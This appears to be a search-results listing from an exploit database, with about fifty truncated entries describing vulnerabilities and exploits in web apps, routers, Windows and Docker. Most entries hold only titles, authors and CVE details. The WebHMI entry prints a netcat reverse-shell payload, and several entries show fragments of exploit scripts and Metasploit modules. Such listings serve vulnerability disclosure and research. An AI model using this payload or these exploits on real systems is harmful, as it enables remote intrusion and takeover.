39001 matches found
TP-LINK TL-WR740N - Multiple HTML Injection Vulnerability
Exploit Title: TP-LINK TL-WR740N - Multiple HTML Injection Vulnerabilities Exploit Author: Shujaat Amin ZEROXINN Vendor Homepage: http://www.tp-link.com Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n Tested on: Windows 10 ---------------------------POC----------------------------- 1 G...
Joomla VirtueMart Shopping Cart 4.0.12 - Reflected XSS Vulnerability
Exploit Title: Joomla VirtueMart Shopping-Cart 4.0.12 - Reflected XSS Exploit Author: CraCkEr Vendor: VirtueMart Team Vendor Homepage: https://www.virtuemart.net/ Software Link: https://demo.virtuemart.net/ Joomla Extension Link:...
Online Food Ordering System 2.0 Cross Site Scripting Vulnerability
Exploit Title: Online Food Ordering System v2 - Stored Cross Site Scripting XSS Exploit Author: Alaeddin Berksoy Vendor Homepage: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html Software Link:...
Geonetwork 4.2.0 - XML External Entity Vulnerability
Exploit Title: Geonetwork 4.2.0 - XML External Entity XXE Exploit Author: Amel BOUZIANE-LEBLOND https://twitter.com/amellb Vendor Homepage: https://geonetwork-opensource.org/ Version: Geonetwork 3.10.X through 4.2.0 Tested on: Microsoft Windows Server & Linux Description: GeoNetwork 3.1.x through...
Medical Hub Directory Site 1.0 Local File Inclusion Vulnerability
Title: Medical Hub Directory Site LFI To RCE Author: Hejap Zairy Vendor: https://www.sourcecodester.com/php/15252/simple-medical-hub-directory-site-phpoop-source-code.html Software:https://www.sourcecodester.com/sites/default/files/download/oretnom23/mhds.zip Reference:...
Cosmetics And Beauty Product Online Store 1.0 Cross Site Scripting Vulnerability
Title: Cosmetics and Beauty Product Online Store v1.0 remote Multiple XSS-Reflected Author: nu11secur1ty Vendor: https://www.sourcecodester.com/users/tips23 Software: https://www.sourcecodester.com/php/15181/cosmetics-and-beauty-product-online-store-phpoop-free-source-code.html CVE-Cosmetics and...
WebHMI 4.0 - Remote Code Execution Exploit
Exploit Title: WebHMI 4.0 - Remote Code Execution RCE Authenticated Exploit Author: Jeremiasz Pluta Vendor Homepage: https://webhmi.com.ua/en/ Version: WebHMI Firmware """ payload2 = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2%261|nc+""" + localhost + """+""" + localport + """+/tmp/f"...
Police Crime Record Management Project 1.0 - Time Based SQL injection Vulnerability
Exploit Title: Police Crime Record Management Project 1.0 - Time Based SQLi Exploit Author: t//\1 Vendor Homepage: https://www.sourcecodester.com/php/14894/police-crime-record-management-system.html Tested on: Linux Version: 1.0 Exploit Description: The application is prone to an arbitrary...
Budget and Expense Tracker System 1.0 - Authenticated Bypass Vulnerability
Exploit Title: Budget and Expense Tracker System 1.0 - Authenticated Bypass Exploit Author: Prunier Charles-Yves Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html Software Link:...
RaspAP 2.6.6 - Remote Code Execution (Authenticated) Exploit
Exploit Title: RaspAP 2.6.6 - Remote Code Execution RCE Authenticated Exploit Author: Moritz Gruber Vendor Homepage: https://raspap.com/ Software Link: https://github.com/RaspAP/raspap-webgui Version: 2.6.6 Tested on: Linux raspberrypi 5.10.52-v7+ import requests from requests.api import post fro...
MikroTik RouterOS Memory Corruption / NULL Pointer Dereference Vulnerbilities
MikroTik RouterOS suffers from NULL pointer dereference, memory corruption and division by zero vulnerabilities. Advisory: three vulnerabilities found in MikroTik's RouterOS Details ======= MikroTik RouterOS Memory Corruption / NULL Pointer Dereference Vulnerbilities Product: MikroTik's RouterOS...
Docker Privileged Container Escape Exploit
This Metasploit module escapes from a privileged Docker container and obtains root on the host machine by abusing the Linux cgroup notification on release feature. This exploit should work against any container started with the following flags: --cap-add=SYSADMIN, --privileged. This module requir...
OpenEMR 5.0.1 Remote Code Execution Exploit
Exploit for php platform in category web applications !/usr/bin/env ruby Title: OpenEMR --shell --user --password --debug FILE semi-auto --root-url --user --password --payload --lhost --lport --debug FILE auto --root-url --user --password --lhost --lport --debug FILE -H | --help Options: -r ,...
Cacti 1.2.8 - Authenticated Remote Code Execution Exploit
Exploit for multiple platform in category web applications !/usr/bin/python3 Exploit Title: Cacti v1.2.8 Remote Code Execution Exploit Author: Askar @mohammadaskar2 CVE: CVE-2020-8813 Vendor Homepage: https://cacti.net/ Version: v1.2.8 Tested on: CentOS 7.3 / PHP 7.1.33 import requests import sys...
IceWarp WebMail 11.4.4.1 - Reflective Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Title: IceWarp WebMail 11.4.4.1 - Reflective Cross-Site Scripting Author: Lutfu Mert Ceylan Vendor Homepage: www.icewarp.com Tested on: Windows 10 Versions: 11.4.4.1 and before Vulnerable Parameter: "color" Get Method Google Dork:...
OpenBSD OpenSMTPD Privilege Escalation / Code Execution Vulnerabilities
Qualys discovered a vulnerability in OpenSMTPD, OpenBSD's mail server. This vulnerability is exploitable since May 2018 commit a8e222352f, "switch smtpd to new grammar" and allows an attacker to execute arbitrary shell commands, as root. OpenBSD OpenSMTPD Privilege Escalation / Code Execution...
Citrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution Exploit
Exploit for multiple platform in category web applications This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Citrix ADC Remote Code Execution', 'Description' = %q An issue was discovered in Citri...
Jalios JCMS 10 Backdoor Account / Authentication Bypass Vulnerabilities
Jalios JCMS 10 allows attackers to access any part of the website and the WebDAV server with administrative privileges via a backdoor account using any username and a specific password. Jalios JCMS 10 Backdoor Account / Authentication Bypass Vulnerabilities I. VULNERABILITY...
PDF Signer 3.0 - SSTI to RCE via CSRF Cookie Vulnerability
Exploit for php platform in category web applications Exploit Title: PDF Signer v3.0 - SSTI to RCE via CSRF Cookie Exploit Author: dd email protected Vendor Homepage: https://codecanyon.net/user/simcycreative Software Link:...
phpMyAdmin 4.7.x - Cross-Site Request Forgery Vulnerability
Exploit for php platform in category web applications Exploit Title: phpMyAdmin 4.7.x - Cross-Site Request Forgery Exploit Author: VulnSpy Vendor Homepage: https://www.phpmyadmin.net/ Software Link: https://www.phpmyadmin.net/downloads/ Version: Versions 4.7.x prior to 4.7.7 Tested on: php7 mysql...
ASUS infosvr Authentication Bypass Command Execution Exploit
This Metasploit module exploits an authentication bypass vulnerability in the infosvr service running on UDP port 9999 on various ASUS routers to execute arbitrary commands as root. This Metasploit module launches the BusyBox Telnet daemon on the port specified in the TelnetPort option to gain an...
PHPMailer 5.2.18 - Remote Code Execution (Python) Exploit
Exploit for php platform in category web applications """ Exploit Title: PHPMailer Exploit v1.0 Date: 29/12/2016 Exploit Author: Daniel aka anarc0der Version: PHPMailer 3 - Open other terminal and run the exploit: python3 anarcoder.py Video PoC: https://www.youtube.com/watch?v=DXeZxKr-qsU Full...
VUPlayer 2.49 - (.pls) Buffer Overflow Vulnerability
VUPlayer is a freeware multi-format audio player for windows. Copy of the Vendor Homepage: http://vuplayer.com/vuplayer.php Technical Details & Description: ================================ The classic buffer overflow vulnerability is located in the software VUPlayer an attacker can manipulate th...
Cisco AnyConnect 3.1.08009 - Privilege Escalation via DMG Install Script Exploit
Exploit for macOS platform in category dos / poc / Cisco AnyConnect elevation of privileges via DMG install script - proof of concept Yorick Koster, July 2015 https://securify.nl/advisory/SFY20150701/ciscoanyconnectelevationofprivilegesviadmginstallscript.html based on...
Microsoft Window - HTTP.sys PoC (MS15-034)
Exploit for windows platform in category dos / poc / UNTESTED - MS15-034 Checker THE BUG: 8a8b2112 56 push esi 8a8b2113 6a00 push 0 8a8b2115 2bc7 sub eax,edi 8a8b2117 6a01 push 1 8a8b2119 1bca sbb ecx,edx 8a8b211b 51 push ecx 8a8b211c 50 push eax 8a8b211d e8bf69fbff call HTTP!RtlULongLongAdd...
com_extcalendar Mambo Component <= 2.0 Include Vulnerability
Exploit for unknown platform in category web applications ============================================================ comextcalendar Mambo Component = 2.0 Include Vulnerability ============================================================...
ABB Cylon FLXeon 9.3.4 login.js Node Timing Attack Exploit
ABB Cylon FLXeon version 9.3.4 has a timing attack vulnerability in the authentication process due to an improper comparison of password hashes in login.js and uukl.js. !/usr/bin/env python3 ABB Cylon FLXeon 9.3.4 login.js Node Timing Attack Vendor: ABB Ltd. Product web page: https://www.global.a...
HughesNet HT2000W Satellite Modem - Password Reset Exploit
Exploit Title: HughesNet HT2000W Satellite Modem Arcadyan httpd 1.0 - Password Reset Exploit Author: Simon Greenblatt Vendor: HughesNet Version: Arcadyan httpd 1.0 Tested on: Linux CVE: CVE-2021-20090 import sys import requests import re import base64 import hashlib import urllib red = "\0330;41m...
ORing IAP-420 2.01e Cross Site Scripting / Command Injection Vulnerabilities
------------------------------------------------------------------------------- title| Multiple Vulnerabilities product| ORing IAP-420 vulnerable version| 2.01e fixed version| - CVE number| CVE-2024-5410, CVE-2024-5411 impact| High homepage| https://oringnet.com/ found| 2024-01-19 by| T. Weber...
Moodle 4.3 - Insecure Direct Object Reference Vulnerability
Exploit Title: Moodle 4.3 'id' Insecure Direct Object Reference IDOR Exploit Author: tmrswrr Vendor Homepage: https://moodle.org/ Software Demo: https://school.moodledemo.net/ Version: 4.3+ Tested on: Linux Vulnerability Details ====================== Steps : 1. Log in to the application with the...
Car Rental Script 1.8 - Stored Cross-site scripting Vulnerability
Exploit Title: Car Rental Script 1.8 - Stored Cross-site scripting XSS Exploit Author: CraCkEr Vendor: GZ Scripts Vendor Homepage: https://gzscripts.com/ Software Link: https://gzscripts.com/car-rental-php-script.html Version: 1.8 Tested on: Windows 10 Pro Impact: Manipulate the content of the si...
Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to XSS Vulnerability
Exploit Title: Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting XSS Exploit Author: Mostafa Farzaneh WPScan page: https://wpscan.com/vulnerability/95f92062-08ce-478a-a2bc-6d026adf657c Vendor Homepage:...
GeoVision Camera GV-ADR2701 - Authentication Bypass Vulnerability
Exploit Title: GeoVision Camera GV-ADR2701 - Authentication Bypass Device name: GV-ADR2701 Exploit Author: Chan Nyein Wai Vendor Homepage: https://www.geovision.com.tw/ Software Link: https://www.geovision.com.tw/download/product/ Firmware Version: V1.0020171215 Tested on: windows 10 Exploitation...
WebTareas 2.4 - Reflected XSS (Unauthorised) Vulnerability
Exploit Title: WebTareas 2.4 - Reflected XSS Unauthorised Exploit Author: Hubert Wojciechowski Contact Author: email protected Vendor Homepage: https://sourceforge.net/projects/webtareas/ Software Link: https://sourceforge.net/projects/webtareas/ Version: 2.4 Tested on: Windows 10 using XAMPP,...
ChurchCRM 4.4.5 SQL injection session hijacking Vulnerability
Title: ChurchCRM 4.4.5 SQLi session hijacking L2 Author: nu11secur1ty Date: 05.11.2022 Vendor: https://churchcrm.io/ Software: https://github.com/ChurchCRM/CRM Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-31325 Description: There is a SQL Injection hijacking sessio...
Arunna 1.0.0 - (Multiple) Cross-Site Request Forgery Vulnerability
Exploit Title: Arunna 1.0.0 - 'Multiple' Cross-Site Request Forgery CSRF Exploit Author: =LL= Detailed Bug Description: https://lyhinslab.org/index.php/2021/11/29/how-white-box-hacking-works-xss-csrf-in-arunna/ Vendor Homepage: https://github.com/arunna Software Link:...
WordPress Ultimate Maps 1.2.4 Plugin - Reflected Cross-Site Scripting Vulnerability
Exploit Title: WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting XSS Author: 0xB9 Software Link: https://wordpress.org/plugins/ultimate-maps-by-supsystic/ Version: 1.2.4 Tested on: Windows 10 CVE: CVE-2021-24274 1. Description: The plugin did not sanitize the tab parameter of...
ASUS GiftBox Desktop 1.1.1.127 - (ASUSGiftBoxDesktop) Unquoted Service Path Vulnerability
Exploit Title: ASUS GiftBox Desktop 1.1.1.127 - 'ASUSGiftBoxDesktop' Unquoted Service Path Discovery by: Oscar Flores Vendor Homepage: https://www.asus.com/ Software Link : https://www.microsoft.com/en-us/p/asus-giftbox/9wzdncrdrb6s?activetab=pivot:overviewtab Tested Version: 1.1.1.127...
Centreon 19.04 - Authenticated Remote Code Execution Exploit
Exploit for php platform in category web applications This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Centreon Authenticated Macro Expression Location Setting Handler Code Execution",...
Optergy 2.3.0a - Cross-Site Request Forgery (Add Admin) Vulnerability
Exploit for hardware platform in category web applications Title: Optergy 2.3.0a - Cross-Site Request Forgery Add Admin Author: LiquidWorm Vendor: https://optergy.com/ Product web page: https://optergy.com/products/ Affected version: history.pushState'', '', '/' input type="hidden" name...
Microsoft Office 365 / ProPlus 16.0.11929.202.88 Remote Code Execution Vulnerability
Exploit Title: Microsoft Office365 Remote Code Execution Vulnerability Date: 2/11/19 Exploit Author: Social Engineering Neo - @EngineeringNeo Vendor Homepage: https://microsoft.com Software Link: https://office.com Version: Office365/ProPlus build 16.0.11727.20222, 16.0.11901.20170,...
AppXSvc - Privilege Escalation Vulnerability
----------------------------------------------------------------------------- Exploit Title: AppXSvc - Arbitrary File Security Descriptor Overwrite EoP Exploit Author: Gabor Seljan Vendor Homepage: https://www.microsoft.com/ Version: 17763.1.amd64fre.rs5release.180914-1434 Tested on: Windows 10...
Freefloat FTP Server 1.0 - SIZE Remote Buffer Overflow Exploit
Exploit Title: Free Float FTP 1.0 "SIZE" Remote Buffer Overflow Exploit Author: Kevin Randall Vendor Homepage: Software Link: http://www.freefloat.com/software/freefloatftpserver.zip Version: Firmware: Free Float FTP 1.0 Tested on: Windows XP Professional Service Pack 2 CVE : N/A Generate Shellco...
TufinOS 2.17 Build 1193 - XML External Entity Injection Vulnerability
Exploit for linux platform in category web applications Exploit Title: TufinOS 2.17 Build 1193 - XML External Entity Injection Exploit Author: konstantinos Alexiou Vendor: https://www.tufin.com Software Link: https://www.tufin.com/tufin-orchestration-suite/securetrack CVE: N/A Category: webapps 1...
PHPJabbers Cinema Booking System 2.0 SQL Injection Vulnerability
CVE-2024-57430 An SQL injection vulnerability in the pjActionGetUser function of PHPJabbers Cinema Booking System v2.0 allows attackers to manipulate database queries via the column parameter. Exploiting this flaw can lead to unauthorized information disclosure, privilege escalation, or database...
Online Shopping Portal Project 2.0 SQL Injection Vulnerability
x========================================================================================================================================x | Title : Online Shopping Portal Project 2.0 SQL Vulnerabilities | Software : Online Shopping Portal Project | Create By :...
NVClient v5.0 - Stack Buffer Overflow Exploit
Exploit Title: NVClient v5.0 - Stack Buffer Overflow DoS Discovered by: Ahmet Ümit BAYRAM Software Link: http://www.neonguvenlik.com/yuklemeler/yazilim/kst-f919-hd2004.rar Software Manual: http://download.eyemaxdvr.com/DVST%20ST%20SERIES/CMS/Video%20Surveillance%20Management%20SoftwareV5.0.pdf...
WordPress Curtain 1.0.2 Cross Site Scripting Vulnerability
Exploit Title: Multiple Stored Cross-Site Scripting vulnerabilities in WordPress curtain plugin 1.0.2 Exploit Author: Hassan Khan Yusufzai - Splint3r7 Vendor Homepage: https://wordpress.org/plugins/curtain/ Version: 1.0.2 Tested on: Firefox Contact me: h at spidersilk.com Description Several...
Ultimate POS 4.4 - (name) Cross-Site Scripting Vulnerability
Exploit Title: Ultimate POS 4.4 - 'name' Cross-Site Scripting XSS Vendor Homepage: https://ultimatefosters.com/docs/ultimatepos/ Version: 4.4 Product & Service Introduction: =============================== The Ultimate POS is a erp, stock management, point of sale & invoicing web-application. The...
Rocket.Chat 3.12.1 - NoSQL Injection to Remote Code Execution (Unauthenticated) Exploit (2)
Title: Rocket.Chat 3.12.1 - NoSQL Injection to RCE Unauthenticated 2 Author: enox Product: Rocket.Chat Vendor: https://rocket.chat/ Vulnerable Versions: Rocket.Chat 3.12.1 2 CVE: CVE-2021-22911 Credits: https://blog.sonarsource.com/nosql-injections-in-rocket-chat Info : This is a faster exploit...